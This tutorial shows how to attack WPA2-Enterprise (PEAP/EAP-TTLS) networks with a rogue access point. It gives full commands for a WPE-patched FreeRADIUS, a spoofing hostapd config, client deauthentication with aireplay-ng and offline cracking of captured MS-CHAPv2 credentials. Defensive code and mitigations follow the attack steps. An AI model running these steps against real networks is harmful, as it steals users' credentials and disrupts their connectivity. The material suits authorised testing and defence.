Attacking WPA2 enterprise
In this article we will learn about Attacking WPA2 enterprise.
Introduction to Attacking WPA2 enterprise:
The widespread use of mobile and portable devices in the enterprise environment requires the proper implementation of a wireless network infrastructure to provide them with connectivity and ensure business functionality.
WPA-Enterprise is ideal for corporations: it does not use a single PSK with which all users connect to the wireless network; instead, each user has their own credentials that they use to authenticate to the network. This allows for flexibility and centralized management of domain accounts.
Wireless communications can carry a lot of sensitive information; if an unauthorized user is able to intercept the traffic or connect to a wireless access point, that information can be obtained and the confidentiality, integrity and availability of an organization's data subsequently compromised.
Background
The WPA-Enterprise standard, also known as WPA-802.1X, is designed for enterprise wireless networks and uses supplicants, authenticators, and an authentication server. A supplicant is a client device that is responsible for sending requests to the WLAN and providing credentials to the authenticator. An authenticator is typically an enterprise access point that interfaces with an authentication server, implemented via RADIUS or IAS, to authenticate and authorize the user client.
This technology relies on the Extensible Authentication Protocol (EAP) to send messages between the supplicant and the authentication server, allowing businesses to encapsulate packets using several implementations: EAP-TLS, EAP-TTLS/MSCHAPv2, PEAP/EAP-MSCHAPv2, PEAP/EAP-GTC, PEAP-TLS, EAP-SIM, EAP-AKA, EAP-FAST and LEAP.
This article will focus on deployments of EAP-TTLS (EAP with Tunneled Transport Layer Security) and PEAP (Protected EAP); these implementations are the most widely used in enterprise Wi-Fi today because they are considered very resistant to attack. Although technically different, they work similarly and provide security through a TLS tunnel to ensure that credentials cannot be retrieved, unlike other EAP configurations.

WPA2 enterprise attack
The methodological approach consists of a first step of preparing the network infrastructure, followed by the enumeration of wireless devices, and finally the phase of attacking the connected clients in order to obtain credentials.
The attack consists of spoofing the target network and offering the client a better signal than the legitimate access point, so that a Man-In-The-Middle position is obtained between the clients and the network infrastructure; this is necessary because the TLS tunnel itself is currently secure enough that it cannot easily be broken directly. To carry out this type of attack, you need to be physically close to the target, that is, within the operational range of the enterprise access point.
In a typical attack there is also a reconnaissance phase aimed at identifying all access points and clients and gathering as much information as possible about the target, especially the technologies and implementations in use. Much of this information, in particular the EAP type, can be identified by inspecting the EAP handshake with a sniffer (e.g. Wireshark).
Building infrastructure
The first thing to do before launching an attack is to build an infrastructure that replicates the enterprise wireless environment and matches the target as closely as possible. This provisioning step simulates the real network so that clients can be made to connect to the rogue infrastructure instead of the legitimate one. As mentioned above, the basic components needed are a RADIUS server and an access point.
As for the RADIUS server, we will be using FreeRADIUS v2.1.12, one of the most popular open source RADIUS servers, with the Wireless Pwnage Edition (WPE) patch. This patch logs the authentication requests received, which contain the authentication credentials (challenge/response, username and password).
To install it in a Debian-based environment, you can run the following commands:
$ wget ftp://ftp.freeradius.org/pub/radius/old/freeradius-server-2.1.12.tar.bz2
$ wget https://raw.github.com/brad-anton/freeradius-wpe/master/freeradius-wpe.patch
$ tar -jxvf freeradius-server-2.1.12.tar.bz2
$ cd freeradius-server-2.1.12
$ patch -p1 < ../freeradius-wpe.patch
$ ./configure
$ make && make install
$ ldconfig
Then edit the configuration files to customize the deployment:
/usr/local/etc/raddb/radiusd.conf
ipaddr = 127.0.0.1 # RADIUS IP address
default_eap_type = peap # Configure EAP type to PEAP
/usr/local/etc/raddb/clients.conf
client 192.168.0.0/16 { # IP range and credentials for our clients
secret = testing123 # RADIUS secret
shortname = testAP # RADIUS shortname
}
In a scenario where clients check the validity of a certificate, you must purchase and deploy a valid certificate to the RADIUS server. This issue is not covered in this article.
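To show what "checking the validity of a certificate" means on the client side, here is an added example (not part of the original article) that audits wpa_supplicant network blocks for the two settings that make a supplicant refuse a rogue RADIUS server: a pinned CA certificate (ca_cert or ca_path) and a server-name match (domain_suffix_match, domain_match or subject_match). The configuration text is constructed; the CA file path and the RADIUS domain in it are placeholders.

```python
import re

# Constructed wpa_supplicant.conf: the first block accepts any RADIUS server
# certificate; the second pins the corporate CA and server name (placeholders).
SAMPLE_CONF = """
network={
    ssid="EnterpriseWireless"
    key_mgmt=WPA-EAP
    eap=PEAP
    phase2="auth=MSCHAPV2"
}
network={
    ssid="EnterpriseWireless"
    key_mgmt=WPA-EAP
    eap=PEAP
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_suffix_match="radius.example.com"
    phase2="auth=MSCHAPV2"
}
"""

BLOCK_RE = re.compile(r"network=\{(.*?)\}", re.S)
NAME_KEYS = ("domain_suffix_match", "domain_match", "subject_match")

def parse_blocks(text):
    """Return one dict (key -> unquoted value) per network={...} block."""
    blocks = []
    for body in BLOCK_RE.findall(text):
        entry = {}
        for line in body.splitlines():
            line = line.strip()
            if line and not line.startswith("#") and "=" in line:
                key, _, value = line.partition("=")
                entry[key.strip()] = value.strip().strip('"')
        blocks.append(entry)
    return blocks

def audit_block(block):
    """Findings for one block; an empty list means it will reject a rogue server."""
    findings = []
    if "WPA-EAP" not in block.get("key_mgmt", ""):
        return findings  # PSK or open network: server certificate checks do not apply
    if "ca_cert" not in block and "ca_path" not in block:
        findings.append("no ca_cert/ca_path: any server certificate is accepted")
    if not any(k in block for k in NAME_KEYS):
        findings.append("no server name match: any certificate from that CA is accepted")
    return findings

def audit(text):
    # One (ssid, findings) pair per network block in the config file.
    return [(b.get("ssid"), audit_block(b)) for b in parse_blocks(text)]
```

Without both settings a supplicant will happily complete the TLS tunnel with the rogue RADIUS server described in this article and hand over its MS-CHAPv2 response.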
Now we start the RADIUS server with the following command:
$ radiusd -X // -X parameter for debugging mode

We will use Jouni Malinen's hostapd v2.3, a user-space daemon for wireless access points and authentication servers that supports the IEEE 802.1X standard and can connect to a RADIUS server, to simulate an access point that the victim connects to and that forwards authentication to our RADIUS server.
To install it in a Debian-based environment, you can run the following commands:
$ apt-get install libnl-dev libssl-dev // Dependencies
$ wget http://hostap.epitest.fi/releases/hostapd-2.3.tar.gz
$ tar -zxvf hostapd-2.3.tar.gz
$ cd hostapd-2.3/hostapd/
$ cp defconfig .config
$ make && make install
Hostapd requires a hostapd.conf configuration file to run, which in this scenario might be the following (hostapd does not accept a comment after a value on the same line, so each comment is on its own line):
# Interface used for the access point
interface=wlan1
# Driver interface type
driver=nl80211
# SSID of the wireless network
ssid=EnterpriseWireless
# Levels of event logs
logger_stdout=-1
logger_stdout_level=0
# Enable IEEE 802.1X authentication
ieee8021x=1
# Workaround for the WinXP supplicant
eapol_key_index_workaround=0
# Access point's own IP address
own_ip_addr=127.0.0.1
# RADIUS IP address
auth_server_addr=127.0.0.1
# RADIUS port
auth_server_port=1812
# RADIUS secret
auth_server_shared_secret=testing123
# Configure WPA2
wpa=2
# Key management algorithm
wpa_key_mgmt=WPA-EAP
# Channel used
channel=1
# Pairwise ciphers for WPA
wpa_pairwise=TKIP CCMP
Now we can start the fake access point with the following command:
$ hostapd ./hostapd.conf

Enumeration and deauthentication of clients
After the preparation phase is complete, we need to enumerate the clients connected to the target network and deauthenticate them so that they connect to our fake infrastructure. Both tasks can be performed with Aircrack-ng, the most popular 802.11 wireless LAN assessment suite.
Use this command to enumerate the wireless networks and the clients connected to them:
$ airodump-ng mon0 // mon0 = wireless interface in promiscuous mode
After a few minutes you will have a complete map of all wireless networks and clients identified in the area. At this point we identify the client connected to the target infrastructure and deauthenticate it with the following command:
$ aireplay-ng --deauth 1 -a 00:01:E3:AD:F2:27 -c 00:27:19:CD:D5:4A mon0
// --deauth = deauthentication attack
// -a = MAC address of the access point
// -c = client MAC address
Alternatively, you can simply wait for the client to connect to our infrastructure on its own, but this can mean a very long wait and often does not happen at all.
Capture and crack credentials
After a few minutes, if our signal is stronger, the client will connect to our infrastructure and submit its credentials protected with MS-CHAPv2, in the form of a challenge and response, which are stored in the freeradius-server-wpe.log file.

The final step is to retrieve the credentials in clear text from the authentication exchange. We will use the Asleap tool for this activity, which performs an offline dictionary-based attack. Alternatively, you can use John the Ripper with the NETNTLM format.

If our wordlist contains the password, we will be able to recover it, as in this case. As can be deduced, a good wordlist is very important for the attack to succeed.
Wireless hardware
Of particular note is the hardware used to support these activities. I have personally tested the following network devices, and they worked successfully:
- Alfa USB Long Range Adapter with Atheros chipset
- TP-Link High Gain Wireless USB Adapter with Atheros Chipset
- Router Asus RT-AC66U
- D-Link DIR-601
Conclusion
This article described a possible attack on a WPA2-Enterprise network for which there is no single mitigation; defense in depth is needed to secure EAP-TTLS and PEAP against these types of attacks. The first countermeasure is to force the client to verify the server certificate and to prevent client devices from connecting to the network when verification fails.
Second, it is recommended not to use domain credentials for wireless authentication; if they are necessary, enforce a strong password policy so that passwords are complex and difficult to guess with a dictionary-based attack.
Finally, constantly monitor the coverage area of your wireless network, for example with a wireless IDS, and be ready to respond quickly to spoofed or rogue access points. In addition, isolate the wireless network from the internal network.
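As an added example of the monitoring recommended above (not from the original article), the following Python flags an evil twin in a Wi-Fi survey: any beacon advertising the corporate SSID from a BSSID outside the AP inventory, or from a known BSSID whose authentication type or channel has changed. The inventory and survey rows are constructed; the first inventory BSSID reuses the access point MAC from the aireplay-ng command above, and the rogue row sits on channel 1 with a stronger signal, which is what the hostapd.conf above would produce.

```python
from collections import namedtuple

Beacon = namedtuple("Beacon", "bssid essid channel auth power")

# Constructed inventory of legitimate enterprise APs (auth "MGT" = 802.1X, as
# airodump-ng labels it). The first MAC is the AP from the aireplay-ng example.
INVENTORY = {
    "00:01:E3:AD:F2:27": {"essid": "EnterpriseWireless", "channel": 6, "auth": "MGT"},
    "00:01:E3:AD:F2:28": {"essid": "EnterpriseWireless", "channel": 11, "auth": "MGT"},
}

# Constructed survey rows (BSSID, SSID, channel, auth, signal in dBm). The last
# row is a rogue AP on channel 1 with a stronger signal than the real ones.
SURVEY = [
    Beacon("00:01:E3:AD:F2:27", "EnterpriseWireless", 6, "MGT", -61),
    Beacon("00:01:E3:AD:F2:28", "EnterpriseWireless", 11, "MGT", -70),
    Beacon("AA:BB:CC:00:11:22", "GuestWifi", 6, "PSK", -65),
    Beacon("00:11:22:33:44:55", "EnterpriseWireless", 1, "MGT", -40),
]

def find_rogue_aps(survey, inventory, corporate_essid):
    """Return [(bssid, reason)] for beacons that look like an evil twin of corporate_essid."""
    legit = [b for b in survey if b.bssid.upper() in inventory and b.essid == corporate_essid]
    best_legit_power = max((b.power for b in legit), default=None)
    alerts = []
    for b in survey:
        if b.essid != corporate_essid:
            continue  # other SSIDs are out of scope for this check
        known = inventory.get(b.bssid.upper())
        if known is None:
            reason = f"unknown BSSID advertising {corporate_essid!r} on channel {b.channel} at {b.power} dBm"
            if best_legit_power is not None and b.power > best_legit_power:
                reason += f" (stronger than any legitimate AP, best {best_legit_power} dBm)"
            alerts.append((b.bssid, reason))
        elif known["auth"] != b.auth:
            alerts.append((b.bssid, f"auth changed from {known['auth']} to {b.auth}"))
        elif known["channel"] != b.channel:
            alerts.append((b.bssid, f"channel changed from {known['channel']} to {b.channel}"))
    return alerts

if __name__ == "__main__":
    for bssid, reason in find_rogue_aps(SURVEY, INVENTORY, "EnterpriseWireless"):
        print(f"ALERT {bssid}: {reason}")
```

A real deployment would feed this from periodic airodump-ng or wireless IDS scans and page the responder on the first alert, since a stronger rogue signal is exactly what the attack above relies on.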